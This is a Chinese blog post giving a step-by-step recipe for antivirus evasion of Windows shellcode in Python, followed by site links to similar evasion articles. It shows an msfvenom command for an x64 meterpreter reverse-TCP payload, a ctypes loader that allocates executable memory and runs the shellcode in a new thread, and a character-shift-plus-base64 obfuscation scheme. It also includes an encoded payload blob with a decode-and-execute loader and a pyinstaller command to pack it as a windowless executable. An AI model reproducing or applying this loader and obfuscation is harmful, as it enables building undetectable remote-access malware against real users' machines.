python免杀shellcode案例

最新推荐文章于 2024-02-17 11:28:23 发布
最新推荐文章于 2024-02-17 11:28:23 发布
阅读量284 收藏 2
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiihuang/article/details/130046115
版权

简单的病毒绕过免杀,完成加壳操作

  • kali构造payload 
    msfvenom –platform windows –a x64  -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f py -o shellcode2.py

  • 放置python执行,注意这是64位系统 
    buf = b"\x4d\x5a\x41\x52\x55\......."

import ctypes
shellcode = buf
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64  #注释该句则为32位
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 连接成功

 

  • 进行加密 
    import binascii,base64
resv = binascii.b2a_hex(buf)  #将十六进制转换为字符
src = resv.decode()
# print(res)
def encode(src):
    re = ''
    for r in src:
        new = chr(ord(r)+5) #位移5位
        re += new
    res = base64.b64encode(re.encode()).decode()  #进行base64加密
    print(res)

encode(src)

  • 进行解密并运行 
    import ctypes,binascii,base64

src = "a2g5PT04ajlrNWo9aGg1NTU1NTU5Njo2OTY6NTo3OT04Nmk3OjY7Ojk9PWc6Nzs1OT09Zzo3Nj06Ozk9PWc6Nzc1OWk4Nmg+OT09Zzw3OjU5PTVrZzw5ZjlmOT04Nmg1Zmg4aDs2PGg1NzdoNzU5Nmg2aD41aTk2NTZoNmo3amk6Nzk2OjY5PT1nOjc3NT1nOTc4aDk9NTZpNTs7PTY8PTY9NWc1NzVrPTo8NzU1NTU1NT1nPTU9PTU1NTU1NTk9PTpoNTw5Ozw5PTU2aTU9Zzk9Nj06NTk5PWc5NTc1OT41Nmk1ajg6Ozk9a2toPjlpODZoPjk2PWc4OT09OT01Nmk7OT04Nmg1OTZoNmg+NWlmaDk2NTZoNjg9ajU8Oms2OWg1ODloNzk1PTk6OD5pNjw6aT06PTk5PWc5NTc5OT41Nmk1Ozs5Nj1nNWg5PTk5PWc5NTZoOT41Nmk1OTY9ZzU5PT05Njo9OT01Nmk1OTY6PTpqOj46Zjk2Oj05Njo+OTY6Zjk9PThqaDc1OTY6N2trajU6PTk2Oj46Zjk9PWc2N2o+OWdra2tra2s6aTk+Z2o8PDw4ODc6azg4ODc1NTU1OTY6Ozk+PT5qOzk9PTZqaGY1NTY1NTU1OT49Pmo6OT5naDU3NTU2NjpoaDVmPTY3Zz05Njo5OT49Pmo5OWg9Pms2OTZnZjloPDw3OzU8a2tpOjloPT5qZjs9NTY1NjU1NTU6Pjk2Z2Y3Pj01O2c1NWtraTo7ZjVmOTY6ajo1OjU5aTg2aD45aTg2aDU5PWtraDU5PT0+aDc5PWtraDU5PT0+aDY5NmdmamY1a2lrajVra2k6OT09Pmg8O2Y2NTk2Oj05aD0+ajc5PT0+az45NmdmPj5mOjw5OzZra2k6PTpoNTw5NWY5PmtraGo8Omo6aj0+ODU1NTU1NTk9PThqaDY1OT09Pmo3OWk4Nmg+O2Y1OTk2Oj05PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGo6Ojk9PThoOTc1Omo9Pms7O2Y5NTk2Oj47PTU1NjU1NTU1OTY6PTk9PT5rNzk9ODZoPjk2Z2Y6PWY5OjhqOmtraTo5PT0+aDg5Pj0+aDw5aTg2aD45Pj0+azU5PT0+aWY5PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGk3PTo9OTY6PDo+Oz01NTk1NTU1NTk2Oj07ZjU1OmY5NmdmNWc3azVrODVra2k6Ojw6Pjk2Z2Y8OjtqOWk7NmtraTo5PmtraGpqPjhoa2tra2trOT01Nmg4OT03Pmg7OT09Oms7PDpnOTk2a2tqPDo9O2Y1NTo+OT5oPGg3azVnOmY3Ojtra2k6"
def decode(src):
    res = base64.b64decode(src).decode()
    # print(res)
    sr = ''
    for s in res:
        new = chr(ord(s) - 5)
        sr += new
    # print(sr)
    buf = binascii.a2b_hex(sr)   #将字符转换为十六进制
    return buf

buf = decode(src)

# print(buf)

shellcode = buf
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 使用python命令打包 
    pyinstaller -F -w payload.py

     

     

gg_Go_game
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2024年Python最新【免杀】分离免杀python)_shellcode loader免杀
2401_84585462的博客
05-01 352
import sysf.close()loader加密。
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
python免杀基础——三步(查杀、连接、代码)情况
渗透测试
11-14 1845
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程。调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;本次使用msf生成的shellcode。本次使用msf生成的shellcode。连接和上次一样,秒连。
Python常见的免杀方式
m0_62207482的博客
02-09 1172
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
Python免杀技术详解
weixin_68789096的博客
11-02 1349
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1149
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
小王问我python怎么免杀,我沉默了......
Liyu_6618的博客
02-01 474
Python免杀Shellcode思路
JsLoader:js免杀shellcode,绕过杀毒添加自启
05-05
【JsLoader:js免杀shellcode,绕过杀毒添加自启】 JsLoader是一种恶意软件技术,它利用JavaScript代码来加载和执行恶意payload,目的是在用户计算机上绕过反病毒软件的检测并实现持久化。JavaScript由于其普遍存在...
基于python pyd的shellcode免杀绕过+源代码+文档说明
12-01
基于python pyd的免杀方式。众所周知,python是一种解释型语言,通过pyinstaller打包后,可以提取出pyc文件然后可以通过反编译器得到源代码。 但是我们可以通过将py源文件通过Cpython编译成pyd文件,然后pyinstaller...
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
一款基于pythonshellcode免杀加载器+源代码+文档说明
12-01
## 免杀测试 **过火绒** ![](picture/image-20231019203001783.png) **过defender** ![](picture/image-20231019204156899.png) **动态执行** ![image-20231020182032610](picture/image-20231020182032610....
2020.04-远控免杀从入门到实践(5)-代码篇-Python1
08-03
2020.04-远控免杀从入门到实践(5)-代码篇-Python1
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
免杀】分离免杀python
zhangshuaiijie的博客
06-28 685
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode
Shellcode免杀对抗(Python)
最新发布
qq_74806534的博客
02-17 2万+
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名。先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦。先base64,可以过掉火绒,过不了defender/360。
基于python的简单免杀
2301_76232299的博客
11-21 1927
本次文章只用于技术讨论,学习,切勿用于非法用途。
python免杀
weixin_43152809的博客
07-13 694
最近学习的过程中,发现python的匿名函数很适合用于免杀python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
python学习笔记——python转exe免杀
小橙子的博客
07-07 893
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
shellCode免杀技巧
qq_39330735的博客
05-15 2271
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
python shellcode免杀
06-06
Python shellcode免杀是指使用Python语言编写的shellcode可以避免被杀毒软件检测和拦截。这种技术主要是通过对shellcode进行加密、混淆、动态生成等方式来达到免杀的效果。其中,加密和混淆可以使shellcode的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值